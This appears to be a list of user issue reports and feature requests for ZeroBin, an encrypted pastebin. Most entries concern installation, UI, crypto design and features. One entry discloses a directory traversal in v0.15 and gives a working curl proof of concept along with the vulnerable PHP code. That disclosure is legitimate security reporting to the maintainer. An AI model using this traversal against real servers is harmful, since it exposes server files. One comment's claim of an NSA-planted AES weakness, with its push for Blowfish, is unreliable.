http://links.kevinvuilleumier.net/?qzwJlQ

On http://sebsauvage.net/wiki/doku.php?id=php:zerobin#installation, it says:
"Unzip in a directory, open the page. Yes, that's all."

This is incorrect.

A data directory needs to be created and made writable by the web server.
The tmp directory needs to be made writable by the web server.

Trivial, but siginifacant.

Awesome software, BTW!

The "Reply" and "Add comment" buttons are minuscule. They could use some love, but I am not good at HTML or UI.

If you put an url it will be transformed into a link. But if you click on raw texte, the link will still be here.

Hi,

I was wondering if there is a way to link directly to the raw text version. And if not would it be hard to implement?

Thanks,
Dietmar

Can you add some sort of peering ability for ZeroBin?

Basically allow servers to look for 'pastes' based on its sha-1 or md5 hash, within other friendly servers.

This can be via 'socket', or even a special 'get' page.

Hello,
should I push a version with a second minimalistic mobile Stylesheet for better use on iPhone ...?

Would be great to be able to upload files instead of just text.

When you open httpS://sebsauvage.net/paste in firefox, you get this message:

You should replace the certificate because it is expired and outdated and invalid.
Additionally autoredirect to the https url by default.

As the FAQ says, the VizHash salt is server-side... This means all comments use the same salt...
Someone could grab their IP + their VizHash and explore/bruteforce 504 bits instead of 536, and then all the IPs can be explored/bruteforced as 32 bits...

(Please note that I don't know how VizHashes really work so sorry if I'm wrong...)

hi there,

this is really cool! My concern is that the url for the paste (containing both the identifier and the private key) are more or less public.

Therefore in a hypothetical database raid, couldn't the raiders just find the identifier and key by searching the internet for the particular identifier?

If you copy the content out of a Paste, the Linebreaks are not copied.

I saw that there was an issue with the RAW feature and interpreting HTML and Java.

In IE8 (God help me! I'm at work and have no choice), I enter html code, hit send and the code is interpreted. Did I miss a fix for that or did I mess up anything?

Merci

When there is not enough entropy, ZeroBin asks the user to move the mouse. Fine. Except tablet don't have one.

Currently the user has to act on the page by another mean (eg. selecting text and moving selection cursor) before ZeroBin posts the text.

How could ZeroBin handle that ? Display a small zone where user can tap and move his/her finger ?

(Bug reported by Kevin V.)

The installation instructions, I think, are incorrect.
After reading #80 I found out that you need a /tmp?
Would anyone mind writing a guide as to how to install it?

Thanks,

Sebie

It would be nice to minify Zerobin, reducing its weight by 15% (and 43% if you get rid of jQuery).

In addition to lighten the server load, that allow users with slow connection (and Tor users) to use Zerobin normally (in Africa for example, 100 Ko to download is kind of a big deal).

HTML and CSS minification are quite easy. ic0nic has already done the images optimizations. For javascript it'll be a little harder, but with Closure Compiler perfection would be a command line near.

Finally, by combining the scripts and by putting them at the page bottom (just above the body closing tag) page load time would be greatly reduced (-30% as estimated gtmetrix above), and so would be the rendering (-6%).

Hi,
it would be great to use tab in pastes - it makes structuring the text easier. More precise: to type them, you can insert them with copy-paste from a text editor.
The second thing about tabs: If you copy a text with tabs into the text fied and submit the paste then the tabs will be displayed with 8 as tab width. Is it possible to set this to a lower value (4?)?
Best regards!

line numbering of the paste would be great.

I received two requests for this feature, and I think it can be useful.

• Only the admin can post a paste (using a password)
• Anybody can read (without password)

In user mode, the new/clone buttons would be disabled.

Idk I think it'll be a nice feature. It's for comments ofc.

Hi Sébastien,

I know that you want to avoid "feature creep", but I believe that this option would be very useful.

How should it work: once paste is viewed, it will remember IP address & user agent (better, of course, hash of both) of the viewer (optionally or alternatively, cookie may be set), and after this no one else should see this paste, even knowing the link & key. Cookie option is a little bit more reliable (avoids proxy issues), but may not work if cookies are disabled.

Thus, if intended recipient doesn't see the paste, he knows that something is wrong (someone else "stolen" the link), and if he does see, he can be sure (somehow) that no one else will be able to see it.

Actually, it could be done even a little bit more secure - once paste is viewed, it is re-encrypted with random key which includes unique viewer ID (hash of IP/User-Agent or cookie value) and old paste is deleted (as in "Burn after reading"), thus eliminating the risk of "replay attack".

Hi,

Is there a chance of implementing 512 or 1025 AES for browser encryption?

Thanks
Petter

With the new fork, that includes syntax highlighting, I'm having trouble with long lines.
There is no linebreak at the end of the textarea.

Lorsqu'on accède à un paste "burn after reading" avec la mauvaise clé, le paste est quand même supprimé.
Il faudrait revoir la suppression d'un paste, et faire en sorte que ce soit le client qui donne l'autorisation de suppression d'un paste après sa lecture si c'est un paste en "burn after reading"

via http://sebsauvage.net/wiki/doku.php?id=php:zerobin_discussion#comment_96bf849e529a77031df9c85ed945c89c

Hello,

The list of benefits of the main page claims:

User data is protected even in case of server breach or seizure.

However, we can read a conflicting statement in the drawbacks section of the same page, i.e.:

Users still have to trust the server regarding the respect of their privacy. ZeroBin won't protect the users against malicious servers.

Also, the FAQ clearly state that ZeroBin cannot protect the user from a malicious server.

Since a breached server can clearly be a malicious server, I strongly recommend removing this misleading claim and adding something corresponding to the drawbacks section, e.g., breach or seizure of the server can result in access to user's data.

Technically, we're talking about a malicious user or police agency having access to the server and modifying the code to retrieve the encryption key. At that moment, whenever you access your encrypted information, some javascript (or any other client side code) could send back your key to the server, i.e. the portion after the # character.

I believe a potential solution might be provided by the new Web Crypto API but I'm really not sure. Maybe a browser plugin could to the trick but again, I'm really not sure. It's not my area of research. I'm simply giving hint.

regards,

For reference: http://sebsauvage.net/wiki/doku.php?id=php:zerobin_discussion&#comment_1dbe75ab3779b5dbd09f9f88210f89c9

It has been discovered that AES has a weakness that affects all keysizes. This weakness was independently discovered by microsoft researchers but now there are reasons to believe that this weakness was inserted by the NSA.

However when the list of NSA keywords was leaked out, the word Blowfish was included.
I think we should switch from AES-256 to Blowfish-448 because the fact that the NSA has this cipher as a red flag keyword indicates that they cannot crack the code.

Just saying.

Hi Seb,
Do you plan to implement accounts? It could be useful if it's a "personal" pastebin.

Quand je clique sur RAW text, il m'affiche bien dans l'URL le chemin vers un fichier "document.txt" mais rien ne s'affiche.

http://gilles.wittezaele.fr/paste/ :/

Mon hébergeur permet bien la création et autre action pour les fichiers.

Not a big deal but it should read 'server' not 'serveur'. :-)

The french was comming out!

Works great. I tested another two paste CMS and none of them gave me the support that i needed. This one is great. Thanks.
And, if you can, add different programming languages? Could be great.
Thanks, again. You're doing a great work.

ZeroBin is currently pretty ugly on mobile phones. Proper CSS must be created (eg. remove left/right margins on small devices.)

Great piece of software! thks

It would be great to view a list of all the IP's that accessed a paste (using Visual Hash). This way, when you send pastes by email, you notice any leakage. Of course this feature can be made optional at the creation of the paste.

It could also be displayed with access times, so that we would see when the recipient read our paste, if at all. Btw, VizHashs would match the discussions, which is nice.

In the TODO's list sebsauvage crossed "Add log", so this should be within reach.

ZeroBin v0.15 is vulnerable to directory traversal which may allow
unauthenticated users to view the contents of arbitrary files, with web server
permissions, if a number of conditions are met.

1. The target file must contain valid JSON
2. The user must know the location of the target file on the filesystem
3. A directory with 16 or more valid hex characters must exist on the filesystem
4. The user must know the location of the directory on the filesystem

The following proof of concept is available:

# create a directory with 16 hex characters
mkdir /tmp/aaaaaaaaaaaaaaaa

# create a 'secret' file to be stolen
echo '{"secret":"this is a secret in a file containing valid JSON"}' > /tmp/secret.txt

# steal the file
curl http://example.com/ZeroBin/index.php?..//../../../../../../../../../../../../../../../../../tmp/aaaaaaaaaaaaaaaa/../../../tmp/secret.txt | grep "cipherdata"

Vulnerable code:

'index.php' from line 268 checks the filename contains a hex string but performs no other validation.

On line 277 the contents of the file is stored in '$paste'

if (!empty($_SERVER['QUERY_STRING']))  // Display an existing paste.
{
    $dataid = $_SERVER['QUERY_STRING'];
    if (preg_match('/[a-f\d]{16}/',$dataid))  // Is this a valid paste identifier ?
    {
        $filename = dataid2path($dataid).$dataid;
        if (is_file($filename)) // Check that paste exists.
        {
            // Get the paste itself.
            $paste=json_decode(file_get_contents($filename));

It would be nice if we had an option to choose the exact date of expiration.

For instance, there could be a new item for the "Expires" option called "Specify" that would open a calendar component. The user would choose a date, and data would be saved to expire on 23:59 of this date (or 00:00 ?).

Even when the author of a "paste" has set it to "Expire: Never", it should be nevertheless possible to delete, at least for the author.

The server could distinguish between deletion requests of authorised persons (the author) and others when you

generate two keys when a paste is created

Implementation idea: when a paste is created, always generate two keys for it !

• a first key for read-only like in the current version, and also
• a second key for paste administration:
  • change of expiry time
  • paste deletion
  • change of the pad (I don't know if this is possible)
  • any other admin business

https://github.com/https://github.com/sebsauvage/ZeroBin/blob/master/index.php#L128sebsauvage/ZeroBin/blob/master/index.php#L128

It is written that:

1. Expiration can be set to 'burn', which is no longer true.
2. Default value would be 'never' but isn't it '1month'?
3. So, the optional argument 'burnafterreading' is missing.

Hope that helps!

I love the project and I want to bring up an idea. I don’t know if that was brought up before, if so, I apologize for not reading everything.
It would be cool to build a network with all servers running zerobin and keep the stored encrypted files synchronic to decentralize the service.

Hi,

I just had a small discussion on IRC regarding trustworthiness and code integrity.
Entrusting ZeroBin with my ciphertext is a good step regarding improved confidentiality. This step revokes ZeroBin the authority to read my plain texts. That's good.
However, ZeroBin hosters are still involved as a party that delivers me the code to decrypt the ciphertext. This means they are still empowered to intercept my private data, by hooking in the decryption function.

There are several possible steps to go on from here:

Extreme Paranoia: Use my own client to encrypt and decrypt data. ZeroBin is degraded to nothing but a storage provider, making all your nice UI work useless :(

Moderade Paranoia: The maintainer of ZeroBin is a pretty trustworthy guy, being nice about releasing cool software into the open source community, yadda yadda. I want to trust the maintainer, but not any random domain/server owner who hosts an installation of ZeroBin.

For Extreme Paranoia, I suggest using something completely different :P

For Moderate Paranoia I have written a simple JavaScript snippet (bookmarklet).
The snippet retrieves the JavaScript source codes which are linked from the ZeroBin page and computes a SHA256 sum.
If some external JavaScript is added or the existing JavaScript is modified, the bookmarklet will give a warning.

You can find the minified version here (for use in a bookmarklet, just add a new bookmark, enter 'javascript:' into URL and paste the rest afterwards.).

Here's an uncompressed version for code reviews/patching etc.

P.S.: Obviously, the SHA256 sum has to be changed for each version. Storing multiple hashes across versions is left as an exercise for the reader ;)

When trying to access a paste that either does not exist or has expired, you get an error message in a red rectangle.... but the interface has disappeared.

to make it easier to use, we should display the interface for a new paste, which I achieved with the following modification:

diff --git a/js/zerobin.js b/js/zerobin.js
index 23329a2..9f0a673 100644
--- a/js/zerobin.js
+++ b/js/zerobin.js
@@ -327,7 +327,6 @@ function clonePaste() {
  */
 function newPaste() {
     stateNewPaste();
-    showStatus('');
     $('textarea#message').text('');
 }

@@ -440,6 +439,7 @@ $(function() {
     // Display error message from php code.
     else if ($('div#errormessage').text().length>1) {
         showError($('div#errormessage').text());
+        newPaste();
     }
     // Create a new paste.
     else {

Is that possible to permit ZeroBin to be translated via PO file or anything else?

It's hard to translate it manually at each update. Furthermore I am quite sure that someone else have translated it.

Some solutions:

• po file with gettext (is that possible with JS?)
• add a "myLanguage" branch for each language
• add a repository as "ZeroBin-l10n" that give some translated file to replace in our branch (like page.html for an example)
• etc.

Should I add a redirector in ZeroBin so that when you click a http URL in a paste, the site will not know which pastes it came from ?

Example:
http://sebsauvage.net/paste/?c9723e058ac2ae81#qpQAEDHqaiG3d8iIxJpzGtgwImne5umgth+l//Esb9E=
will show http://sebsauvage.net/paste/?c9723e058ac2ae81 as referer.

Adding the redirector would mask the pasteid.

When submitting a paste on your test server http://sebsauvage.net/paste/ , there is still the "Shorten Url" possibility. This possibility should be removed on your server and also in the code, as it reveals the key.

Or, as an alternative, you change the code, so that only the part

http://sebsauvage.net/paste/?pastename123456#

is shortened. However, I do not see the need for having that.

I would like to have an option to disable pastes to never expire.

Would it be possible to maintain security but offer a simple API for submitting content to a Zerobin deployment and get the secure URL back?

That'd make it really easy to make mobile phone apps and command line tools (Linux) for submitting content.

Could you please advise on the permissions to be set for files and folders?

It set it up like below and it works but I wanted to know if this looks of....

-rw-r--r-- 1 root root 4465 Feb 24 2013 CHANGELOG.md
drwxr-xr-x 2 root root 4096 Feb 24 2013 css
drwx----wx 10 root root 4096 Dec 19 14:17 data
drwxr-xr-x 2 root root 4096 Feb 24 2013 img
-rw-r--r-- 1 root root 16289 Feb 24 2013 index.php
dwxr-xr-x 3 root root 4096 Feb 24 2013 js
drwxr-xr-x 2 root root 4096 Feb 24 2013 lib
-rw-r--r-- 1 root root 1443 Feb 24 2013 README.md
-rw-r--r-- 1 root root 116 Feb 24 2013 robots.txt
drwx----wx 2 root root 4096 Dec 19 12:54 tmp
drwxr-xr-x 2 root root 4096 Dec 19 13:01 tpl

Thanks a lot!

Hi Seb,

I'm a little off topic but I didn't know how to reach you (I didn't search very long though).

I just wrote a cli for ZeroBin. It is a PoC/Draft and it probably should be enhanced but here it is: https://github.com/ziirish/zerocli

You can both paste or retrieve data. It is heavy as it requires rhino to execute javascript (as I couldn't find some openssl based implementation of the sjcl.js library) but it works.

https://github.com/sebsauvage/ZeroBin/blob/master/index.php#L152

Just a little PHP error that causes no troubles but I thought it would be better to report it anyway.

Sending this kind of form will raise the PHP error:

    <form method="post" action="http://sebsauvage.net/paste/">
        <input name="data[]" value="foo" />
        <input name="data[]" value="bar" />
        <input type="submit" />
    </form>

This will cause $_POST['data'] becoming an array instead of a string and PHP won't like to receive one as first argument of strlen.

https://github.com/sebsauvage/ZeroBin/blob/master/index.php#L70

This will also cause json_decode not being happy receiving an array instead of a string, and this will invalidate the data (validSJCL will return False), so nothing will happen anyway.

Currently if you have JS disabled and open a BAR paste, it gets deleted, even tho you didn't read it. My proposal is to move paste data loading to a script, and change how you access paste data to use, say, myzerobin/pastedata_<id> instead of embedding it into the page.

This would also solve IRC bots deleting BAR pastes when fetching page info.

Is will be possible add password protected paste ? General idea is have ability to set static password per paste.

Slava.

The SJCL library implements Fortuna's PRNG (random number generator) which requires a lot of entropy, but SJCL only uses two weak source of entropy: current time and (x,y) of the mouse when the cursor is moved. More and better entropy sources should be used, or another PRNG should be used.

A browser does not offer a PRNG or a CPRNG?

See also issue #37.